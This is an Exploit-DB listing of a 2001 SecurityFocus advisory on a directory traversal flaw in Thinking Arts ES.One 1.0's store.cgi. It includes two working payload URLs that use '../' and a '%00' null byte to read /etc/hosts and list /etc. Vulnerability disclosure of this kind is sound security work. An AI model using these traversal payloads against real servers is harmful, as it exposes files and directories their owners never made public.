Lucene search

K
exploitdbSlipyEDB-ID:20636
HistoryFeb 16, 2001 - 12:00 a.m.

thinking arts es.one 1.0 - Directory Traversal

2001-02-1600:00:00
slipy
www.exploit-db.com
28

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/2385/info

It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory. 

http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html

^^ = Will obviously open the hosts file.

http://target/cgi-bin/store.cgi?StartID=../etc/%00.html

^^ = Will obviously list the /etc/ directory. 

AI Score

7.4

Confidence

Low

Related for EDB-ID:20636